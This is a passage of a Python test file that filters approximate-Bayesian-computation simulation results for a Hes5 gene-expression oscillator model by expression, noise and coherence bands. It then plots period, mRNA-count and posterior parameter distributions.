model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[:,2]
plt.hist(all_periods, range = (0,600), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_full_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_full_mrna_distribution.pdf'))
# accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
# np.logical_and(model_results[:,0]<65000, #cell_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# np.logical_and(model_results[:,1]>0.05,
# model_results[:,3]>0.1))))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
#
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
my_figure = plt.figure(figsize = (4,2.5))
all_periods = my_model_results[:,2]
plt.hist(all_periods, range = (0,600), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_abc_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = my_model_results[:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_abc_mrna_distribution.pdf'))
def xest_plot_period_distribution_for_poster(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
prior_samples[:,1]<10))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
# real_data = [ 6.4135025721, 6.9483225932, 2.6887457703, 3.8620874625, 3.2559540745,
# 4.4568030424, 5.2120783369, 4.3169191105, 4.2472576997, 2.7684001434,
# 3.6331949226, 5.365000329, 1.1181243755, 4.2130976958, 6.3381760719,
# 2.466899605, 4.7849990718, 5.2029517316, 4.2038143391, 3.9909362984,
# 3.2734490618, 4.3116631965, 5.3199423883]
## the values that Veronica sent initially
#
real_data = [2.0075009033, 5.1156200644, 7.7786868129, 6.4328452748, 7.441794935,
7.0127707313, 2.6890681359, 3.4454911902, 3.8689181126, 3.2493764293,
6.3817264371, 5.8903734106, 4.5034984657, 3.4247641996, 4.4767623623,
4.1803337503, 5.2752672662, 6.9038758003, 4.3200156205, 4.2588402084,
6.1428930891, 5.4124817274, 5.0135377758, 2.8156245427, 5.5008033408,
3.6331974295, 5.295813407, 1.1181243876, 5.5984263674, 4.2800118281,
6.7713656265, 3.4585300534, 6.3727670575, 2.4668994841, 6.3725171059,
4.8021898758, 4.8108333392, 5.9935335349, 6.2570622822, 5.2284704987,
4.2143881493, 4.0659270434, 3.9990674449, 4.4410420437, 6.7406002947,
5.0648853886, 1.8765732885, 3.307425174, 5.6208186717, 4.3185605778,
5.186842823, 5.6310823986, 7.4402931009]
sns.set(font_scale = 1.5)
font = {'size' : 28}
plt.rc('font', **font)
all_periods = my_model_results[:,2]
# dataframe = pd.DataFrame({'Model': all_periods,
#                           'Data' : np.array(real_data)*60})
my_figure = plt.figure(figsize= (5,3))
sns.boxplot(data = [all_periods[all_periods<600], np.array(real_data)*60])
plt.xticks([0,1], ['Model', 'Experiment'])
plt.ylabel('Period [min]')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution_for_poster.pdf'))
def xest_plot_period_distribution_for_coherences(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
my_figure = plt.figure(figsize = (6.5,6.5))
coherence_bands = [[0.0,1.0],
[0.0,0.1],
[0.1,0.2],
[0.2,0.3],
[0.3,0.4],
# [0.4,0.5]]
[0.4,0.5],
[0.5,0.6],
[0.6,0.7]]
for coherence_index, coherence_band in enumerate(coherence_bands):
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,3]>coherence_band[0],
model_results[:,3]<coherence_band[1])))))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
my_figure.add_subplot(4,2,coherence_index + 1)
all_periods = my_model_results[:,2]
plt.hist(all_periods, range = (0,600), bins = 20)
plt.title(r'Coherence $\in$ '
+ np.array_str(np.array(coherence_band), precision=1))
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_abc_period_distribution_for_coherences.pdf'))
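# The coherence statistic binned above is, in the usual convention for
# this model, the fraction of spectral power concentrated around the
# dominant peak of the trace's power spectrum. A hedged sketch of that
# definition:
#
#   def coherence(frequencies, power, relative_width = 0.2):
#       peak_frequency = frequencies[np.argmax(power)]
#       band = np.abs(frequencies - peak_frequency) < relative_width*peak_frequency
#       return np.trapz(power[band], frequencies[band])/np.trapz(power, frequencies)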
def xest_upsample_hill_abc(self):
## generate posterior samples
total_number_of_samples = 200000
# total_number_of_samples = 10
prior_bounds = {'basal_transcription_rate' : (0,4),
'translation_rate' : (0,200),
'repression_threshold' : (0,100000),
'time_delay' : (5,40),
'hill_coefficient': (2,7)}
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
# 'mRNA_degradation_rate': (0.001, 0.04),
# 'protein_degradation_rate': (0.001, 0.04),
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_hill_low_transcription',
prior_bounds = prior_bounds,
prior_dimension = 'hill',
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 5))
def xest_make_abc_all_parameters_long_delay(self):
## generate posterior samples
total_number_of_samples = 20000
prior_bounds = {'basal_transcription_rate' : (0,100),
'translation_rate' : (0,200),
'repression_threshold' : (0,150000),
'time_delay' : (20,40),
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
'mRNA_degradation_rate': (0.001, 0.04),
'protein_degradation_rate': (0.001, 0.04)}
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 100,
saving_name = 'sampling_results_all_parameters_long_delay',
prior_bounds = prior_bounds,
prior_dimension = 'full',
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 6))
def xest_plot_langevin_abc_differently(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
acceptance_ratio = 0.02
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
distance_table = hes5.calculate_distances_to_data(model_results)
my_posterior_samples = hes5.select_posterior_samples( prior_samples,
distance_table,
acceptance_ratio )
self.assertEqual(my_posterior_samples.shape,
(int(round(total_number_of_samples*acceptance_ratio)), 4))
# plot distribution of accepted parameter samples
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['transcription_rate',
'translation_rate',
'repression_threshold',
'transcription_delay'])
sns.set()
pairplot = sns.pairplot(data_frame)
# pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_dots_langevin_' + str(total_number_of_samples) + '_'
+ str(acceptance_ratio) + '.pdf'))
def xest_plot_full_abc_in_band(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_200')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_all_parameters.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_full_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_full_mrna_distribution.pdf'))
def xest_plot_abc_all_parameters_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_200')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.3))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_all_parameters_oscillating.pdf'))
def xest_plot_abc_all_parameters_not_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_200')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.2))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_all_parameters_not_oscillating.pdf'))
def xest_plot_full_abc_in_band_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_long_delay')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_full_bands_long_delay.pdf'))
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
        # saved under a long-delay-specific name (assumed intent) so that the
        # distributions written by the full-ABC method above are not overwritten
        plt.savefig(os.path.join(os.path.dirname(__file__),
                    'output','abc_full_period_distribution_long_delay.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
        # long-delay-specific name (assumed intent), matching the period plot above
        plt.savefig(os.path.join(os.path.dirname(__file__),
                    'output','abc_full_mrna_distribution_long_delay.pdf'))
def xest_plot_full_abc_not_oscillating_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_long_delay')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(model_results[:,3]<0.3, #coherence
prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_full_long_delay_not_oscillating.pdf'))
def xest_plot_full_abc_oscillating_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters_long_delay')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(model_results[:,3]>0.3, #coherence
prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_full_long_delay_oscillating.pdf'))
def xest_plot_langevin_abc_in_band_not_oscillating_different_prior(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_small_prior')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.3))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_not_oscillating_bands_different_prior.pdf'))
def xest_plot_different_prior_in_band(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_small_prior')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_bands_different_prior.pdf'))
def xest_plot_langevin_abc_in_band_not_oscillating_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_small_prior')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(model_results[:,3]<0.3, #coherence
prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_not_oscillating_bands_long_delay_different_prior.pdf'))
def xest_plot_upsample_hill_abc_in_band(self):
# generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.axes[-1,0].set_xlim(0,5)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_hill_low_transcription.pdf'))
def xest_plot_hill_abc_in_band(self):
# generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_hill_bands.pdf'))
def xest_plot_heterozygous_homozygous_comparison(self):
# generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
number_of_traces_per_sample = 200
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
# model_results = hes5.calculate_heterozygous_summary_statistics_at_parameters( my_posterior_samples,
# number_of_traces_per_sample )
# np.save(os.path.join(os.path.dirname(__file__), 'output','heterozygous_comparison.npy'), model_results)
model_results = np.load(os.path.join(os.path.dirname(__file__), 'output','heterozygous_comparison.npy'))
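        # layout inferred from the plots below: model_results[sample, condition, statistic],
        # where condition 0 = homozygous, 1 = single allele, and the statistics
        # are 0: mean, 1: std/mean, 2: period, 3: coherence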
my_figure = plt.figure( figsize = (6,5) )
my_figure.add_subplot(221)
plt.scatter(model_results[:,0,0]/10000, model_results[:,1,0]/10000,
color = 'grey', lw = 0, marker = '.')
plt.plot(model_results[:,0,0]/10000, model_results[:,0,0]/20000,
color = 'black')
plt.xlabel('Homozygous mean')
plt.ylabel('Allele mean')
plt.text(0.1, 0.8, 'Slope: 1/2',
transform=plt.gca().transAxes)
my_figure.add_subplot(222)
plt.scatter(model_results[:,0,1], model_results[:,1,1],
color = 'grey', lw = 0, marker = '.')
plt.plot(model_results[:,0,1], model_results[:,0,1]*2,
color = 'black')
plt.text(0.1, 0.8, 'Slope: 2',
transform=plt.gca().transAxes)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
# plt.gca().locator_params(axis='y', tight = True, nbins=5)
plt.xlabel('Homozygous std/mean')
plt.ylabel('Allele std/mean')
my_figure.add_subplot(223)
plt.scatter(model_results[:,0,2], model_results[:,1,2],
color = 'grey', lw = 0, marker = '.')
plt.plot(model_results[:,0,2], model_results[:,0,2],
color = 'black')
plt.text(0.1, 0.8, 'Slope: 1',
transform=plt.gca().transAxes)
plt.xlim(0,500)
plt.ylim(0,)
plt.xlabel('Homozygous period')
plt.ylabel('Allele period')
my_figure.add_subplot(224)
plt.scatter(model_results[:,0,3], model_results[:,1,3],
color = 'grey', lw = 0, marker = '.')
plt.plot(model_results[:,0,3], model_results[:,0,3] - 0.2,
color = 'black')
plt.text(0.1, 0.8, 'Slope: 1, offset: -0.2',
transform=plt.gca().transAxes)
plt.ylim(0,)
plt.xlabel('Homozygous coherence')
plt.ylabel('Allele coherence')
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','heterozygous_homozygous_comparison.pdf'))
def xest_plot_langevin_abc_in_band(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_bands.pdf'))
def xest_plot_heterozygous_abc(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
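        # heterozygous band: the target mean expression (25000-35000) is half
        # of the homozygous 55000-65000 band used elsewhere in this section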
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_heterozygous_bands.pdf'))
def xest_plot_langevin_abc_in_band_oscillating_different_prior(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_small_prior')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.3))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_oscillating_bands_different_prior.pdf'))
def xest_plot_hill_abc_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.2))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_hill_oscillating.pdf'))
def xest_plot_hill_abc_not_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.2))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_hill_not_oscillating.pdf'))
def xest_plot_heterozygous_abc_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
acceptance_ratio = 0.02
total_number_of_samples = 20000
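        # note: acceptance_ratio and total_number_of_samples are not used in this method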
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.2))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_heterozygous_oscillating.pdf'))
def xest_plot_langevin_abc_in_band_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
acceptance_ratio = 0.02
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.3))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
# sns.set()
# # plot distribution of accepted parameter samples
# data_frame = pd.DataFrame( data = my_posterior_samples,
# columns= ['transcription_rate',
# 'translation_rate',
# 'repression_threshold',
# 'transcription_delay'])
# pairplot = sns.pairplot(data_frame)
# pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_oscillating_bands.pdf'))
def xest_plot_heterozygous_abc_not_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_100reps')
acceptance_ratio = 0.02
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.15))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_heterozygous_not_oscillating.pdf'))
def xest_plot_langevin_abc_in_band_not_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_100reps')
acceptance_ratio = 0.02
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.2))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_not_oscillating.pdf'))
def xest_plot_langevin_abc_in_band_oscillating_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
